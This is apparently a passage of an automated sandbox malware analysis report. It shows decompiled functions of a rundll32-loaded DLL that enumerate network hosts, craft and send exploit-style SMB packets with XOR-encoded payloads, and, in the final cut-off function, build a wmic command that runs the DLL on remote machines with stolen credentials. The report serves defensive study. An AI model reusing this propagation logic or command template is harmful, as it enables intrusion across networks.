    					_t42 = _v8;
    					_a12 = 1;
    					if(_t42 == _t44) {
    						goto L16;
    					}
    					_t40 = 0;
    					if(_v12 <= _t44) {
    						L13:
    						goto L14;
    					}
    					_t43 = _t42 + 4;
    					while(_t43 != 4) {
    						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
    							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
    								_t44 = 0;
    								E011E6FC7( *_t43, 0, _a4);
    							}
    						} else {
    							E011E795A(_a4, 3,  *_t43); // executed
    						}
    						_t43 = _t43 + 0x18;
    						_t40 = _t40 + 1;
    						if(_t40 < _v12) {
    							continue;
    						} else {
    							goto L13;
    						}
    					}
    					goto L13;
    				} else {
    					_a12 = 0;
    					L14:
    					if(_v8 != _t44) {
    						NetApiBufferFree(_v8);
    					}
    					L16:
    					return _a12;
    				}
    			}

    APIs
    • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,002E8160,?,002E8160,?,002E8160,00000000,002E8160), ref: 011E798B
    • NetApiBufferFree.NETAPI32(?), ref: 011E7A08
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E668A(signed int* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
    				void _v88;
    				void* _t23;
    				void* _t25;
    				signed int* _t31;
    				void* _t32;
    				void* _t37;
    
    				_t37 = __eflags;
    				_t31 = __ecx;
    				memset( &_v88, 0, 0x54);
    				 *0x11ffb48 = GetTickCount();
    				 *0x11ff8fd = 0;
    				_t23 = E011E5A7E(_t31, _t37,  &_v88, _a4, 0x1bd, 0, _a8, _a12, _a16, _a20, _a24, _a28); // executed
    				_t32 = _t23;
    				if(_t32 == 0) {
    					 *0x11ff8fd = 0;
    					_t25 = E011E5A7E(_t31, __eflags,  &_v88, _a4, 0x1bd, E011E1F74, _a8, _a12, _a16, _a20, _a24, _a28); // executed
    					E011E2068( &_v88);
    					return _t25;
    				}
    				E011E2068( &_v88);
    				return _t32;
    			}

    APIs
    • memset.MSVCRT ref: 011E669A
    • GetTickCount.KERNEL32(?,002F1C10,00058778), ref: 011E66A2
      • Part of subcall function 011E5A7E: memcpy.MSVCRT ref: 011E64F8
      • Part of subcall function 011E5A7E: memcpy.MSVCRT ref: 011E651F
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456), ref: 011E65AA
      • Part of subcall function 011E5A7E: rand.MSVCRT ref: 011E5C7A
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456,?,?,?,?,?,?,?,00000001,?,?,?,00001000,?,?,?), ref: 011E5E2D
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10), ref: 011E60E3
      • Part of subcall function 011E5A7E: closesocket.WS2_32(?), ref: 011E6146
      • Part of subcall function 011E5A7E: closesocket.WS2_32(?), ref: 011E6229
      • Part of subcall function 011E5A7E: Sleep.KERNELBASE(00000456,00000000,?,00000014,?,?,?,?,?,?,?,?,?,?,?,?), ref: 011E62F6
      • Part of subcall function 011E2068: closesocket.WS2_32(?), ref: 011E2076
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 37%
    			E011E8243(void* __ecx) {
    				signed int _v8;
    				void** _t9;
    				signed char _t12;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    
    				_t9 =  &_v8;
    				_t16 = 0;
    				_v8 = _v8 & 0;
    				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
    				_t14 = _v8;
    				if(_t9 == 0) {
    					_t12 =  *(_t14 + 0x10);
    					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
    						_t16 = 1;
    					}
    				}
    				if(_t14 != 0) {
    					NetApiBufferFree(_t14);
    				}
    				return _t16;
    			}

    APIs
    • NetServerGetInfo.NETAPI32(00000000,00000065,?,73389263,?,?,011E8FCD), ref: 011E8254
    • NetApiBufferFree.NETAPI32(?,?,?,011E8FCD), ref: 011E8277
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E1000(long _a4) {
    				void* _t3;
    
    				_t3 = HeapAlloc(GetProcessHeap(), 8, _a4); // executed
    				return _t3;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
    • RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 96%
    			E011E3469(int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24, void* _a28, void* _a32, signed int _a36) {
    				signed int _v8;
    				signed int _v12;
    				void* __ebx;
    				void* __esi;
    				void* _t53;
    				void* _t58;
    				void* _t59;
    				signed int _t63;
    				signed int _t65;
    				signed int _t67;
    				void* _t70;
    				void* _t72;
    				short _t76;
    				signed int _t88;
    				signed int _t96;
    				signed int _t98;
    				void* _t100;
    				void* _t101;
    				void* _t104;
    				void** _t112;
    				void* _t113;
    
    				_t87 = __ecx;
    				_push(__ecx);
    				_push(__ecx);
    				_v12 = 0;
    				_v8 = 0;
    				if(_a32 != 0) {
    					_v8 = 0x1015;
    					_t100 = E011E1000(0x1015);
    					if(_t100 == 0) {
    						goto L1;
    					} else {
    						 *((short*)(_t100 + 3)) = 0x1000;
    						 *((short*)(_t100 + 0xb)) = 0x1000;
    						_t76 = 0x35;
    						 *((short*)(_t100 + 0xd)) = _t76;
    						 *((short*)(_t100 + 0xf)) = _a28;
    						 *((short*)(_t100 + 0x11)) = 0;
    						 *((short*)(_t100 + 0x13)) = 0x1000;
    						_t14 = _t100 + 0x15; // 0x15
    						 *_t100 = 9;
    						memcpy(_t14, _a32, 0x1000);
    						_t113 = _t113 + 0xc;
    						_a28 = _t100;
    					}
    				} else {
    					L1:
    					_a28 = 0;
    				}
    				_t53 = _a28;
    				_a32 = _t53;
    				if(_t53 != 0) {
    					_t92 = _v8 + 0x00000024 & 0x0000ffff;
    					_v12 = _v8 + 0x00000024 & 0x0000ffff;
    					_t101 = E011E2466(_v8 + 0x00000024 & 0x0000ffff, 0x33, 0xc007, _a8, _a12, _a16, _a20, _a24);
    					_a24 = _t101;
    					if(_t101 != 0) {
    						_t58 = E011E1000(_t92 & 0x0000ffff);
    						_a20 = _t58;
    						if(_t58 != 0) {
    							_t88 = 9;
    							_t59 = memcpy(_t58, _t101, _t88 << 2);
    							_t87 = _v8 & 0x0000ffff;
    							memcpy(_t59 + 0x24, _a28, _v8 & 0x0000ffff);
    							E011E20D0( &_a32);
    							_t63 = E011E20D0( &_a24);
    							_t104 = _a20;
    						} else {
    							E011E20D0( &_a32);
    							_t112 =  &_a24;
    							goto L8;
    						}
    					} else {
    						_t112 =  &_a32;
    						L8:
    						_t63 = E011E20D0(_t112);
    						goto L5;
    					}
    				} else {
    					L5:
    					_t104 = 0;
    				}
    				_a28 = _t104;
    				if(_t104 != 0) {
    					if(_a36 == 0) {
    						_t65 = E011E688F(_a4, _t104, _v12 & 0x0000ffff); // executed
    						_t96 = _t65;
    						goto L21;
    					} else {
    						_t98 = E011E1000(0x1000);
    						_a36 = _t98;
    						if(_t98 != 0) {
    							_t86 = _a4;
    							_a32 = _a32 & 0x00000000;
    							_t70 = E011E688F(_a4, _t104, _v12 & 0x0000ffff); // executed
    							if(_t70 != 0) {
    								L20:
    								E011E20D0( &_a36);
    								_t96 = _t98 | 0xffffffff;
    							} else {
    								_t72 = E011E243F(_t87, _t86, 1, _t98); // executed
    								if(_t72 == 0) {
    									_t96 =  *(_t98 + 9);
    									E011E20D0( &_a36);
    								} else {
    									goto L20;
    								}
    							}
    							L21:
    							E011E20D0( &_a28);
    							_t67 = _t96;
    						} else {
    							_t63 = E011E20D0( &_a28);
    							goto L13;
    						}
    					}
    				} else {
    					L13:
    					_t67 = _t63 | 0xffffffff;
    				}
    				return _t67;
    			}

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E34CC
      • Part of subcall function 011E2466: htons.WS2_32(-000000FC), ref: 011E247E
    • memcpy.MSVCRT ref: 011E3553
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 98%
    			E011E330E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, void* _a28, void* _a32, void* _a36, signed int _a40, intOrPtr* _a44, void** _a48, short* _a52) {
    				signed short _v8;
    				void* __ebx;
    				void* __esi;
    				void* _t43;
    				void* _t47;
    				signed int _t52;
    				void* _t56;
    				signed int _t58;
    				void* _t59;
    				void* _t60;
    				signed int _t69;
    				signed int _t72;
    				void* _t83;
    				void* _t86;
    				void* _t89;
    				int _t94;
    				void** _t98;
    				void* _t99;
    
    				_push(__ecx);
    				_t66 = 0;
    				_v8 = _v8 & 0;
    				_t43 = E011E2CCF( &_v8, _a28, _a32, _a36, _a40);
    				_a36 = _t43;
    				if(_t43 != 0) {
    					_t66 = _v8 + 0x00000024 & 0x0000ffff;
    					_t86 = E011E2466(_v8 + 0x00000024 & 0x0000ffff, 0x32, 0xc007, _a8, _a12, _a16, _a20, _a24);
    					_a32 = _t86;
    					if(_t86 != 0) {
    						_t47 = E011E1000(_t66);
    						_a28 = _t47;
    						if(_t47 != 0) {
    							_t72 = 9;
    							memcpy(memcpy(_t47, _t86, _t72 << 2) + 0x24, _a36, _v8 & 0x0000ffff);
    							_t99 = _t99 + 0x18;
    							E011E20D0( &_a36);
    							_t52 = E011E20D0( &_a32);
    							_t89 = _a28;
    							L8:
    							_a36 = _t89;
    							if(_t89 != 0) {
    								_t75 = _a40 & 0x0000ffff;
    								 *_a44 =  *_a44 + (_a40 & 0x0000ffff);
    								_t83 = E011E1000(0x1000);
    								_a32 = _t83;
    								if(_t83 != 0) {
    									_a40 = _a40 & 0x00000000;
    									_t67 = _a4;
    									_t56 = E011E688F(_a4, _t89, _t66 & 0x0000ffff); // executed
    									if(_t56 != 0) {
    										L15:
    										E011E20D0( &_a32);
    										goto L12;
    									}
    									_t59 = E011E243F(_t75, _t67, 1, _t83); // executed
    									if(_t59 == 0) {
    										_t94 = _a40 & 0x0000ffff;
    										_t69 =  *(_t83 + 9);
    										_t60 = E011E1000(_t94);
    										 *_a48 = _t60;
    										if(_t60 != 0) {
    											 *_a52 = _a40;
    											memcpy(_t60, _t83, _t94);
    										} else {
    											_t69 = _t69 | 0xffffffff;
    										}
    										E011E20D0( &_a32);
    										E011E20D0( &_a36);
    										_t58 = _t69;
    										L10:
    										return _t58;
    									}
    									goto L15;
    								}
    								L12:
    								_t52 = E011E20D0( &_a36);
    							}
    							_t58 = _t52 | 0xffffffff;
    							goto L10;
    						}
    						E011E20D0( &_a36);
    						_t98 =  &_a32;
    						L4:
    						_t52 = E011E20D0(_t98);
    						goto L1;
    					}
    					_t98 =  &_a36;
    					goto L4;
    				}
    				L1:
    				_t89 = 0;
    				goto L8;
    			}

    APIs
      • Part of subcall function 011E2CCF: memcpy.MSVCRT ref: 011E2D72
      • Part of subcall function 011E2466: htons.WS2_32(-000000FC), ref: 011E247E
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E33A1
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
    • memcpy.MSVCRT ref: 011E345F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 94%
    			E011E3C0A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24) {
    				void* _v8;
    				void* __esi;
    				signed int _t13;
    				signed int _t15;
    				signed int _t18;
    				signed int _t20;
    				signed int _t24;
    				void* _t27;
    
    				_push(__ecx);
    				_t13 = E011E1000(0x1000);
    				_t27 = _t13;
    				_v8 = _t27;
    				if(_t27 != 0) {
    					memset(_t27, 0x54, 0xb8c);
    					_t15 = 0;
    					do {
    						_t2 = _t15 + 0x11f0b08; // 0xa8008051
    						_t22 =  *_t2;
    						 *((char*)(_t27 + _t15 + 0xb8c)) =  *_t2;
    						_t15 = _t15 + 1;
    					} while (_t15 < 0xaf);
    					_t5 = _t27 + 0xc3b; // 0xc3b
    					memset(_t5, 0x54, 0x3c5);
    					_t18 = E011E3469(_t22, _a4, _a8, _a12, _a16, _a20, _a24, 0xf3d0, _t27, 1); // executed
    					_t24 = _t18;
    					if(_t24 == 0xc000000d) {
    						_t24 = 0;
    					}
    					E011E20D0( &_v8);
    					_t20 = _t24;
    				} else {
    					_t20 = _t13 | 0xffffffff;
    				}
    				return _t20;
    			}

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memset.MSVCRT ref: 011E3C2F
    • memset.MSVCRT ref: 011E3C5D
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E34CC
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E3553
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E3DD7(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed short _a32, char _a36, char _a40, intOrPtr _a44, intOrPtr* _a48) {
    				char _v8;
    				long _v12;
    				signed int _v19;
    				intOrPtr _v20;
    				void* __esi;
    				signed int _t48;
    				void* _t53;
    				signed int _t59;
    				signed short _t64;
    				signed int _t71;
    				void* _t81;
    				void* _t87;
    
    				if(_a36 != 0) {
    					_t64 = _a32;
    					_t3 = (_t64 & 0x0000ffff) + 0xc; // 0xff0b
    					_v12 = _t3;
    					_t81 = E011E1000(_t3);
    					 *_t81 = _a40;
    					 *(_t81 + 4) = _t64;
    					_t10 = _t81 + 0xc; // 0xc
    					_t65 = _t10;
    					_v8 = _t81;
    					 *((intOrPtr*)(_t81 + 8)) =  *_a48;
    					memcpy(_t10, _a36 + _a44, _t64 & 0x0000ffff);
    					_v19 = 0;
    					_t48 = 0;
    					_v20 = _a28;
    					do {
    						_t71 = _t48 & 0x80000003;
    						if(_t71 < 0) {
    							_t71 = (_t71 - 0x00000001 | 0xfffffffc) + 1;
    						}
    						_t72 =  *(_t87 + _t71 - 0x10);
    						 *(_t48 + _t81) =  *(_t48 + _t81) ^  *(_t87 + _t71 - 0x10);
    						_t48 = _t48 + 1;
    					} while (_t48 < _v12);
    					_a40 = 0;
    					_a36 = 0;
    					_t53 = E011E330E(_t72, _a4, _a8, _a12, _a16, _a20, _a24 + 1, 0xf2, _t81, _t65, _a32, _a48,  &_a36,  &_a40); // executed
    					if(_t53 != 0xffffffff) {
    						E011E20D0( &_v8);
    						E011E20D0( &_a36);
    						_t59 = (0 | ( *(_a36 + 0x1a) & 0x0000ffff) == 0x00000011) - 1;
    					} else {
    						E011E20D0( &_a36);
    						_t59 = E011E20D0( &_v8) | 0xffffffff;
    					}
    					return _t59;
    				}
    				return __eax | 0xffffffff;
    			}

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E3E22
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E33A1
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E345F
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 96%
    			E011E2F88(void __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, short* _a16, void* _a20, signed int _a24, signed int _a28, signed short _a32, void** _a36, signed short* _a40) {
    				signed short _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t34;
    				void* _t37;
    				signed int _t40;
    				void* _t41;
    				void* _t44;
    				void _t48;
    				signed short _t50;
    				void* _t56;
    				signed int _t57;
    				int _t64;
    
    				_t51 = __ecx;
    				_push(__ecx);
    				_v8 = _v8 & 0x00000000;
    				_t48 = __eax;
    				_t34 = E011E28B5(_a24, __ecx, _a4, _a8, _a12, _a20, _a28, _a32,  &_v8);
    				_a24 = _t34;
    				if(_t34 != 0) {
    					_t56 = E011E1000(0x1000);
    					_a20 = _t56;
    					if(_t56 != 0) {
    						_a32 = _a32 & 0x00000000;
    						_t37 = E011E688F(_t48, _a24, _v8 & 0x0000ffff); // executed
    						if(_t37 != 0) {
    							L8:
    							_t57 = _t56 | 0xffffffff;
    							L9:
    							E011E20D0( &_a20);
    							E011E20D0( &_a24);
    							_t40 = _t57;
    							L4:
    							L5:
    							return _t40;
    						}
    						_t41 = E011E243F(_t51, _t48, 1, _t56); // executed
    						if(_t41 == 0) {
    							_t50 = _a32;
    							_t64 = _t50 & 0x0000ffff;
    							 *_a16 =  *((intOrPtr*)(_t56 + 0x20));
    							_a28 =  *((intOrPtr*)(_t56 + 9));
    							_t44 = E011E1000(_t64);
    							 *_a36 = _t44;
    							if(_t44 == 0) {
    								_a28 = _a28 | 0xffffffff;
    							} else {
    								 *_a40 = _t50;
    								memcpy(_t44, _t56, _t64);
    							}
    							_t57 = _a28;
    							goto L9;
    						}
    						goto L8;
    					}
    					_t40 = E011E20D0( &_a24) | 0xffffffff;
    					goto L4;
    				}
    				_t40 = _t34 | 0xffffffff;
    				goto L5;
    			}

    APIs
      • Part of subcall function 011E28B5: memcpy.MSVCRT ref: 011E290D
      • Part of subcall function 011E28B5: memcpy.MSVCRT ref: 011E29C1
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    • memcpy.MSVCRT ref: 011E304E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 91%
    			E011E3B5D(int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24) {
    				signed int _v8;
    				signed int _v12;
    				void* __esi;
    				signed int _t23;
    				void* _t26;
    				signed int _t28;
    				void* _t32;
    				signed int _t39;
    
    				_t34 = __ecx;
    				_push(__ecx);
    				_push(__ecx);
    				_t23 = E011E1000(0xf000); // executed
    				_t39 = _t23;
    				_v12 = _t39;
    				if(_t39 != 0) {
    					_t2 = _t39 + 0x80b; // 0x80b
    					 *((intOrPtr*)(_t39 + 0x807)) = 0x3668f383;
    					memset(_t2, 0x54, 0xe7f4);
    					_v8 = _v8 & 0x00000000;
    					_t32 = 0x3d0;
    					while(1) {
    						_t26 = E011E3469(_t34, _a4, _a8, _a12, _a16, _a20, _a24, _t32, _t39, 0); // executed
    						if(_t26 != 0) {
    							break;
    						}
    						_t32 = _t32 + 0x1000;
    						_v8 = _v8 + 1;
    						_t39 = _t39 + 0x1000;
    						if(_v8 < 0xf) {
    							continue;
    						} else {
    							E011E20D0( &_v12);
    							_t28 = E011E369D(_a4, _t34, _a8, _a12, _a16, _a20, _a24); // executed
    						}
    						L6:
    						goto L7;
    					}
    					_t28 = E011E20D0( &_v12) | 0xffffffff;
    					goto L6;
    				} else {
    					_t28 = _t23 | 0xffffffff;
    				}
    				L7:
    				return _t28;
    			}

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memset.MSVCRT ref: 011E3B95
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E34CC
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E3553
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011EC223(signed int _a8, signed int _a12) {
    				void* _t5;
    
    				_t5 = malloc(_a8 * _a12); // executed
    				return _t5;
    			}

    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd

    Non-executed Functions

    C-Code - Quality: 100%
    			E011E98AB(WCHAR* __ecx, WCHAR* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v524;
    				char _v16908;
    				signed short* _t33;
    				void* _t36;
    				short _t40;
    				short _t43;
    				WCHAR* _t44;
    				signed int _t45;
    				signed int _t46;
    				WCHAR* _t47;
    
    				_t47 = __esi;
    				E011EA4F0(0x4208);
    				_t44 = __ecx;
    				 *__esi = 0;
    				 *((short*)(__ecx)) = 0;
    				_t36 = 0;
    				E011E8B70( &_v524);
    				if(GetSystemDirectoryW(_t44, 0x104) == 0) {
    					GetLastError();
    					goto L9;
    				} else {
    					PathAppendW(_t44, L"wbem\\wmic.exe");
    					if(PathFileExistsW(_t44) == 0) {
    						L9:
    						 *_t47 = 0;
    						 *_t44 = 0;
    					} else {
    						_t45 = wsprintfW(__esi, L"%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" ", _t44, _a4, _a8, _a12);
    						_t46 = _t45 + wsprintfW( &(__esi[_t45]), L"process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 ",  &_v524);
    						E011E6BB0( &_v16908);
    						_t33 =  &_v16908;
    						while(1) {
